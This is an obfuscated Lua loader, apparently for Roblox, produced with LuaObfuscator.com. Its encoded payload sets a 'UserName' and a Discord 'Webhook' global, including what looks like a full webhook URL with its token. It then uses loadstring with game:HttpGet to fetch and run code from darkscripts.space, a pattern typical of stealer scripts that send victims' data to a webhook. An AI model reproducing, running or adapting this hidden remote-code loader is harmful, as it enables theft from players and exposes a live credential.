--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v79=0;local v80;while true do if (v79==0) then v80=v2(v0(v30,16));if v19 then local v105=v5(v80,v19);v19=nil;return v105;else return v80;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/(((5 + 0) -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v81-(v81%(932 -(857 + 74))) ;else local v82=568 -(367 + 201) ;local v83;while true do if (v82==(927 -(214 + 713))) then v83=(1 + 1)^(v32-(1 + (0 -0))) ;return (((v31%(v83 + v83))>=v83) and (878 -(282 + 595))) or (1637 -(1523 + (1179 -(68 + 997)))) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + (157 -72))) );v18=v18 + 4 + 0 ;return (v40 * (3720433 + (23970033 -10913250))) + (v39 * (66493 -(892 + (415 -(87 + 263))))) + (v38 * (610 -354)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=181 -(67 + 113) ;local v44=(v20(v42,1,15 + 5 ) * ((4 -2)^(24 + (13 -5)))) + v41 ;local v45=v20(v42,83 -62 ,31);local v46=((v20(v42,(977 + 7) -(802 + 150) )==(2 -1)) and  -(1 -0)) or 1 ;if (v45==(0 + 0)) then if (v44==(997 -(915 + 82))) then return v46 * (0 -0) ;else v45=1 + 0 ;v43=0;end elseif (v45==(2691 -644)) then return ((v44==((1978 -(368 + 423)) -(1069 + 118))) and (v46 * ((2 -(3 -2))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/(2^(10 + 42)))) ;end local function v25(v47) local v48=18 -(10 + 8) ;local v49;local v50;while true do if (v48==(3 -2)) then v49=v3(v16,v18,(v18 + v47) -(443 -(416 + 26)) );v18=v18 + v47 ;v48=6 -4 ;end if (2==v48) then v50={};for v89=773 -(201 + 571) , #v49 do v50[v89]=v2(v1(v3(v49,v89,v89)));end v48=2 + 1 ;end if (v48==(1138 -((411 -295) + 1022))) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=(860 -(814 + 45)) -(0 -0) ;end if (v48==(441 -(145 + 293))) then return v6(v50);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v51==1) then local v87=(function() return 0;end)();while true do if (v87~=(0 + 0)) then else v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v87=(function() return 1 + 0 ;end)();end if (v87==1) then v57=(function() return v23();end)();v51=(function() return 653 -(494 + 157) ;end)();break;end end end if (v51~=(0 -0)) then else v52=(function() return function(v99,v100,v101) local v102=(function() return 0;end)();local v103=(function() return;end)();while true do if (v102~=(0 + 0)) then else v103=(function() return 0;end)();while true do if (v103==0) then local v125=(function() return 0;end)();while true do if (v125==0) then v99[v100-#"," ]=(function() return v101();end)();return v99,v100,v101;end end end end break;end end end;end)();v53=(function() return {};end)();v54=(function() return {};end)();v51=(function() return 1 + 0 ;end)();end if (v51==3) then for v91= #"~",v23() do local v92=(function() return 0;end)();local v93=(function() return;end)();while true do if ((0 + 0)~=v92) then else v93=(function() return v21();end)();if (v20(v93, #".", #"~")==0) then local v111=(function() return 0;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (3~=v111) then else if (v20(v113, #"xnx", #"nil")~= #"}") then else v114[ #"?id="]=(function() return v58[v114[ #".com"]];end)();end v53[v91]=(function() return v114;end)();break;end if (v111~=1) then else local v129=(function() return 0;end)();while true do if (v129==(837 -(660 + 176))) then v111=(function() return 1 + 1 ;end)();break;end if (v129~=0) then else v114=(function() return {v22(),v22(),nil,nil};end)();if (v112==(675 -(534 + 141))) then local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();while true do if (v176~=0) then else v177=(function() return 0;end)();while true do if (v177~=0) then else v114[ #"xxx"]=(function() return v22();end)();v114[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v112== #"{") then v114[ #"xxx"]=(function() return v23();end)();elseif (v112==(2 + 0)) then v114[ #"xnx"]=(function() return v23() -((2 + 0)^(33 -17)) ;end)();elseif (v112== #"-19") then local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182==(0 -0)) then v183=(function() return 0;end)();while true do if (v183==(0 -0)) then v114[ #"19("]=(function() return v23() -((2 + 0)^(11 + 5)) ;end)();v114[ #"0836"]=(function() return v22();end)();break;end end break;end end end v129=(function() return 397 -(115 + 281) ;end)();end end end if (v111~=(4 -2)) then else if (v20(v113, #"}", #",")== #"\\") then v114[2 + 0 ]=(function() return v58[v114[2]];end)();end if (v20(v113,2,2)== #"{") then v114[ #"19("]=(function() return v58[v114[ #"xxx"]];end)();end v111=(function() return 7 -4 ;end)();end if (v111~=(0 -0)) then else v112=(function() return v20(v93,2, #"asd");end)();v113=(function() return v20(v93, #"xnxx",873 -(550 + 317) );end)();v111=(function() return 1;end)();end end end break;end end end for v94= #"|",v23() do v54,v94,v28=(function() return v52(v54,v94,v28);end)();end return v56;end if (v51==(2 -0)) then local v88=(function() return 0 -0 ;end)();while true do if (v88==1) then v56[ #"-19"]=(function() return v21();end)();v51=(function() return 3;end)();break;end if (v88==(0 -0)) then v58=(function() return {};end)();for v106= #"!",v57 do local v107=(function() return 285 -(134 + 151) ;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (1==v107) then v110=(function() return nil;end)();while true do if ((1665 -(970 + 695))~=v108) then else local v160=(function() return 0 -0 ;end)();while true do if (v160~=(1990 -(582 + 1408))) then else v109=(function() return v21();end)();v110=(function() return nil;end)();v160=(function() return 3 -2 ;end)();end if (v160~=1) then else v108=(function() return 1;end)();break;end end end if (v108==(1 -0)) then if (v109== #",") then v110=(function() return v21()~=0 ;end)();elseif (v109==(7 -5)) then v110=(function() return v24();end)();elseif (v109== #"asd") then v110=(function() return v25();end)();end v58[v106]=(function() return v110;end)();break;end end break;end if (v107==0) then v108=(function() return 1824 -(1195 + 629) ;end)();v109=(function() return nil;end)();v107=(function() return 1;end)();end end end v88=(function() return 1;end)();end end end end end local function v29(v59,v60,v61) local v62=v59[1 -0 ];local v63=v59[243 -(187 + 54) ];local v64=v59[783 -(162 + 618) ];return function(...) local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1 + 0 ;local v70= -(1 + 0);local v71={};local v72={...};local v73=v12("#",...) -(1 -0) ;local v74={};local v75={};for v84=0 + 0 ,v73 do if (v84>=v67) then v71[v84-v67 ]=v72[v84 + (1637 -(1373 + 263)) ];else v75[v84]=v72[v84 + (1001 -(451 + 549)) ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1 + 0 ];if (v78<=(15 -5)) then if (v78<=4) then if (v78<=(1 -0)) then if (v78==(1384 -(746 + 638))) then local v115=v77[(1 -0) + 1 ];local v116,v117=v68(v75[v115](v13(v75,v115 + (1 -0) ,v77[344 -(218 + 123) ])));v70=(v117 + v115) -(1582 -(1535 + 46)) ;local v118=(65 -(30 + 35)) + 0 ;for v126=v115,v70 do local v127=0 + 0 ;while true do if (((560 -(211 + 95 + 254))==v127) or (1430>=3612)) then v118=v118 + 1 + 0 ;v75[v126]=v116[v118];break;end end end else v75[v77[3 -(1258 -(1043 + 214)) ]]();end elseif ((2683>=2460) and (v78<=(1469 -(899 + (2147 -1579))))) then if (v75[v77[2 + 0 ]]==v77[9 -5 ]) then v69=v69 + (1213 -(323 + 889)) ;else v69=v77[606 -(268 + 335) ];end elseif (v78==(293 -(60 + 230))) then v75[v77[5 -3 ]]=v77[575 -(426 + 146) ];else v75[v77[1 + 1 ]]=v61[v77[1459 -(282 + 1174) ]];end elseif ((v78<=(818 -(569 + 242))) or (1804>=3275)) then if (v78<=(14 -9)) then if (v75[v77[(581 -(361 + 219)) + 1 ]]==v77[1028 -(706 + 318) ]) then v69=v69 + (1252 -(721 + 530)) ;else v69=v77[1274 -(945 + 326) ];end elseif (v78>(14 -8)) then local v136=0 + 0 ;local v137;while true do if ((700 -(271 + 429))==v136) then v137=v77[2 + 0 ];v75[v137]=v75[v137](v13(v75,v137 + ((1821 -(53 + 267)) -(1408 + 92)) ,v70));break;end end else v61[v77[3]]=v75[v77[2]];end elseif (v78<=((248 + 846) -(461 + 625))) then local v119=1288 -(993 + 295) ;local v120;while true do if (v119==((413 -(15 + 398)) + 0)) then v120=v77[1173 -((1400 -(18 + 964)) + 753) ];v75[v120]=v75[v120](v13(v75,v120 + 1 ,v70));break;end end elseif ((v78>9) or (1417>3629)) then v69=v77[3];else local v141=v77[1 + 1 ];local v142=v75[v77[3]];v75[v141 + 1 + 0 ]=v142;v75[v141]=v142[v77[4]];end elseif (v78<=15) then if ((4795>402) and (v78<=(4 + 8))) then if ((4813>3565) and (v78>(3 + 8))) then v75[v77[531 -(406 + 123) ]]=v61[v77[1772 -(1749 + 20) ]];else v69=v77[1 + 2 ];end elseif (v78<=13) then v75[v77[1324 -(1249 + 73) ]]=v77[2 + 1 ]~=(1145 -(466 + 679)) ;elseif (v78==(33 -19)) then local v146=v77[5 -3 ];local v147,v148=v68(v75[v146](v13(v75,v146 + 1 ,v77[11 -8 ])));v70=(v148 + v146) -1 ;local v149=1900 -(106 + 1794) ;for v164=v146,v70 do local v165=0 + 0 ;while true do if (0==v165) then v149=v149 + 1 ;v75[v164]=v147[v149];break;end end end else local v150=v77[1 + 1 ];local v151=v75[v77[3]];v75[v150 + (2 -(1 + 0)) ]=v151;v75[v150]=v151[v77[4]];end elseif (v78<=(48 -30)) then if ((3912==3912) and (v78<=(130 -(4 + 70 + 40)))) then do return;end elseif ((2821<=4824) and (v78==(601 -(57 + 527)))) then v75[v77[1429 -(41 + 1386) ]]=v77[106 -((867 -(20 + 830)) + 86) ];else v75[v77[2 + 0 ]]=v77[6 -3 ]~=(0 -(0 + 0)) ;end elseif (v78<=((311 -(116 + 10)) -(122 + 44))) then v75[v77[(1 + 1) -0 ]]();elseif (v78>20) then v61[v77[9 -6 ]]=v75[v77[(740 -(542 + 196)) + 0 ]];else do return;end end v69=v69 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403263Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706C65617365646F6E61746503083Q00557365724E616D65030D3Q004772616E745F6A6F7264616E3503073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31333135323438323531333137392Q313537322F347574387647484E342D6377516B34355F6858636E654B6E4C6253456B324976755673515F795557525A683750614B4A595A6C76434666527A36484A6B564A7A436B2D66001D3Q0012033Q00013Q0026023Q000C0001000200040B3Q000C0001001204000100033Q001204000200043Q00200F000200020005001203000400064Q000D000500016Q000200054Q000700013Q00022Q001300010001000100040B3Q001C00010026023Q00010001000100040B3Q00010001001203000100013Q002602000100130001000200040B3Q001300010012033Q00023Q00040B3Q000100010026020001000F0001000100040B3Q000F0001001203000200083Q001215000200073Q0012030002000A3Q001215000200093Q001203000100023Q00040B3Q000F000100040B3Q000100012Q00103Q00017Q00",v9(),...);
